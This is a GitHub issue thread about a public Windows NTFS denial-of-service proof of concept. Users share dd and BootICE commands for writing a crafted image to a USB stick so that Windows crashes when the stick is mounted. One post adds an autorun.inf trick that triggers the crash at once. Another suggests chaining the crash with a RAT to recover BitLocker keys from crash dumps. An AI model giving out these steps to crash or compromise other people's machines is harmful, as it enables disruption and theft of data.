how to write this ntfs img to usb disk about windows10_ntfs_crash_dos HOT 29 OPEN

working for me now wrote on windows with dd.exe

download from here(used beta5)
http://www.chrysocome.net/downloads/1f150e835d6bde24e2fc1c9107e8e503/dd-0.4beta5.zip

run command as admin in cmd:
dd if=tinyntfs of=\\.\d:

(note d: is the drive letter of my NTFS formatted usb stick)

as soon as you plug in the stick explorer tries to open, then instant bsod ntfs.sys is the cause.

from windows10_ntfs_crash_dos.

Creating an autotun.inf with icon=4 should crash immediately

from windows10_ntfs_crash_dos.

写入u盘成功了，但是我插在windows10上面没有反应啊，windows10提示”无法访问，文件或目录损坏且无法访问“是什么情况？

from windows10_ntfs_crash_dos.

sudo dd if=./tinyntfs of=/dev/sdb1
[sudo] password for cx:
20472+0 records in
20472+0 records out
10481664 bytes (10 MB, 10 MiB) copied, 3.76947 s, 2.8 MB/s

from windows10_ntfs_crash_dos.

can't work .how to use

from windows10_ntfs_crash_dos.

finally got the files to write to a usb with.
dd if=tinyntfs of=\.\d:

(dual \ after of= before the .
plugging in the usb after writing the drive shows up as D: in explorer with size of 9.99mb
clicking on drive says: "The file or directory is corrupt and unreadable"

nothing autoruns, no bsod.

from windows10_ntfs_crash_dos.

@eocene317

I tried to use dd, but it didn't work on Windows7 Pro 6.1.7601 SP1, Build 7601 x64.

➜ sudo dd if=./tinyntfs of=/dev/disk[N] bs=1m

N is the udisk physical device number

Output

➜  diskutil unmountDisk /dev/disk2
Unmount of all volumes on disk2 was successful
➜  sudo dd if=./tinyntfs of=/dev/disk2 bs=1m
Password:
9+1 records in
9+1 records out
10481664 bytes transferred in 2.718003 secs (3856384 bytes/sec)
➜  

from windows10_ntfs_crash_dos.

Tried and not work :(

Tivadar contacted Microsoft about the issue in July 2017, but published the PoC code today after the OS maker declined to classify the issue as a security bug.

It's already fixed

from windows10_ntfs_crash_dos.

anybody succeed？

from windows10_ntfs_crash_dos.

没有啊，我就没有成功
@richard1225 I did not succeed

from windows10_ntfs_crash_dos.

@mitsukuri I get "File write failed: access denied" error with restore from file option.

from windows10_ntfs_crash_dos.

@mitsukuri formatted to fat32 usb,
and all but [system] and system volume information copied over, the stick doesnt cause the bsod

from windows10_ntfs_crash_dos.

I cannot reproduce this on latest Windows 8.1 Industry Pro either. By the age of this expoit (reported to Microsoft on July 2017) it is safe to assume that Microsoft already fixed it silently.

from windows10_ntfs_crash_dos.

dd.exe if=tinyntfs of=\\.\d: bs=1M count=10

If on Windows, you can download dd: http://www.chrysocome.net/dd

It works on Windows 10 latest build, it is apparently not fixed. Download/pull tinyfs again, it has been changed to work.

from windows10_ntfs_crash_dos.

@mtivadar

dd.exe if=tinyntfs of=.\d: bs=1M count=10
rawwrite dd for windows version 1.0beta1 WIN64.
Written by John Newbigin [email protected]
This program is covered by terms of the GPL Version 2.
Error opening output file: 123 The filename, directory name, or volume label syntax is incorrect.

tinyntfs is in the directory the command was ran from...
running removing the .\ infront of D: gives a different error.

dd.exe if=tinyntfs of=D: bs=1M count=10
rawwrite dd for windows version 0.4beta5.
Written by John Newbigin [email protected]
This program is covered by the GPL. See copying.txt for details
read from 95 disk

nothing is on the target D: disk

from windows10_ntfs_crash_dos.

please see readme

from windows10_ntfs_crash_dos.

Make sure you pulled the last version of tinyntfs

from windows10_ntfs_crash_dos.

BootICE works. Here's the demo showing the USB drive crashing the computer after "restoring" the partition from file (Windows 7 Home Premium x64)
https://youtu.be/N6OJJR7vWlk
You have to click on the button or open the drive in Explorer for this to crash your computer, though.

from windows10_ntfs_crash_dos.

I used Bootice 1.3.3.2 x64 on Win10 and it is written * Successed *, but then when I inserted the flash drive into another PC it wrote that * there is no access to the disk. the file or folder is corrupt, reading is impossible *. It was the same with dd.exe. I used a normal 2GB disk.

UPD: I did everything. I do not know why, but it did not work on my win10 laptop (this is not the first problem by the way with which I encounter it, which is solved by other PCs).

from windows10_ntfs_crash_dos.

@Twml1500 If you have not figured out the access error yet, then you should go into the properties of the flash drive and give full access to your user (or for all) on the security and access tab. Link to the instructions in the pictures

from windows10_ntfs_crash_dos.

from windows10_ntfs_crash_dos.

You can add autorun.inf by writing this to that file (you only need [autorun] and icon=4 part for this to work):

[autorun]
icon=4
open=FAKEFILE.EXE
label=BSODSTICK

Then dragging the file into the drive icon on Windows 7 or by using Linux.
To test, just unplug the device and replug it if you are on Windows 7.

from windows10_ntfs_crash_dos.

@shotbyapony What is your OS? Do you have autorun.inf?
With it, it crashes almost immediately every time, and on the same computer.

from windows10_ntfs_crash_dos.

@UnforeseenOcean will you be able to recover your windows after getting the BSOD?

from windows10_ntfs_crash_dos.

@abhimanyuZ the ntfs BSOD is a harmless hard stop error,
reboot and pc will start normally. no long term damage.

from windows10_ntfs_crash_dos.

@abhimanyuZ Yes, it's a harmless BSOD and unless there was some file that was being written it should be okay.
I sometimes use this to prevent people from accessing my computer by plugging this in when I leave my seat for a long time.

from windows10_ntfs_crash_dos.

@UnforeseenOcean @XxTWMLxX
Then in which way this exploit can actually cause trouble to victim?

from windows10_ntfs_crash_dos.

@abhimanyuZ The crash occurs immediately when the OS recognizes and tries to access the disk in question; it can be used as a way to cause denial-of-service.
Now I wonder though, will this work with virtual disk solutions?

from windows10_ntfs_crash_dos.

@abhimanyuZ it can be used to generate a crash dump file that can contain the bitlocker encryption key in it, with enough knowledge and time you can extract that info and get the bitlocker password, then be able to steal and use the pc/data on it. just one of the many uses, it can also be combined with malware like a rat, rat installs,bsod happens, malicious person(s) then can remotely recover the before mentioned crash dump.

from windows10_ntfs_crash_dos.